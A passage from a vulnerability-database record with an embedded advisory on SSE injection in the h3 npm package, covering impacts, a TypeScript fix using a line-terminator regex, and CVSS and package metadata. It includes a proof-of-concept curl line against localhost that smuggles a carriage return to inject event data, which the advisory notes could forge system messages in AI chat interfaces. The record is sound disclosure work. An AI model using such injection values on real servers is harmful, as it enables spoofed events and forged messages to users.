via pushComment() — escape from comment into data\ncurl -N --no-buffer \"http://localhost:3000/sse-comment?comment=x%0Ddata:%20injected\"\n```\n\n**Browser parses as:**\n```\n: x          (comment, ignored)\ndata: injected  (real data, dispatched as event)\n```\n\n## Impact\n\n- **Event spoofing:** Attacker can inject arbitrary `event:` types, causing browsers to dispatch events to different `EventSource.addEventListener()` handlers than intended. In applications that use custom event types for control flow (e.g., `error`, `done`, `system`), this enables UI manipulation.\n- **Message boundary injection:** A single `push()` call can be split into multiple browser-side events. This breaks application-level framing assumptions — e.g., a chat message could appear as two messages, or an injected \"system\" message could appear in an AI chat interface.\n- **Comment-to-data escalation:** Data can be injected through what the application considers a harmless comment field via `pushComment()`.\n- **Bypass of existing security control:** The prior fix (commit `7791538`) explicitly intended to prevent SSE injection, demonstrating the project considers this a security issue. The incomplete fix creates a false sense of security.\n\n## Recommended Fix\n\nBoth `formatEventStreamMessage` and `formatEventStreamComment` should split on `\\r`, `\\n`, and `\\r\\n` — matching the SSE spec's line terminator definition.\n\n```typescript\n// src/utils/internal/event-stream.ts\n\n// Add a shared regex for SSE line terminators\nconst SSE_LINE_SPLIT = /\\r\\n|\\r|\\n/;\n\nexport function formatEventStreamComment(comment: string): string {\n  return (\n    comment\n      .split(SSE_LINE_SPLIT)  // was: .split(\"\\n\")\n      .map((l) => `: ${l}\\n`)\n      .join(\"\") + \"\\n\"\n  );\n}\n\nexport function formatEventStreamMessage(message: EventStreamMessage): string {\n  let result = \"\";\n  if (message.id) {\n    result += `id: ${_sanitizeSingleLine(message.id)}\\n`;\n  }\n  if (message.event) {\n    result += `event: ${_sanitizeSingleLine(message.event)}\\n`;\n  }\n  if (typeof message.retry === \"number\" && Number.isInteger(message.retry)) {\n    result += `retry: ${message.retry}\\n`;\n  }\n  const data = typeof message.data === \"string\" ? message.data : \"\";\n  for (const line of data.split(SSE_LINE_SPLIT)) {  // was: data.split(\"\\n\")\n    result += `data: ${line}\\n`;\n  }\n  result += \"\\n\";\n  return result;\n}\n```\n\nThis ensures all three SSE-spec line terminators (`\\r\\n`, `\\r`, `\\n`) are properly handled as line boundaries, preventing `\\r` from being passed through to the browser where it would be interpreted as a line break.","references":[{"reference_url":"https://github.com/h3js/h3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3"},{"reference_url":"https://github.com/h3js/h3/security/advisories/GHSA-4hxc-9384-m385","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/h3js/h3/security/advisories/GHSA-4hxc-9384-m385"},{"reference_url":"https://github.com/advisories/GHSA-4hxc-9384-m385","reference_id":"GHSA-4hxc-9384-m385","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-4hxc-9384-m385"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374618?format=json","purl":"pkg:npm/h3@1.15.9","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@1.15.9"},{"url":"http://public2.vulnerablecode.io/api/packages/374881?format=json","purl":"pkg:npm/h3@2.0.1-rc.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-6ctj-mfw8-u7b1"},{"vulnerability":"VCID-kz7g-hxqt-dkaq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@2.0.1-rc.17"}],"aliases":["GHSA-4hxc-9384-m385"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v8vs-b2fc-kyhw"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/h3@0.7.0"}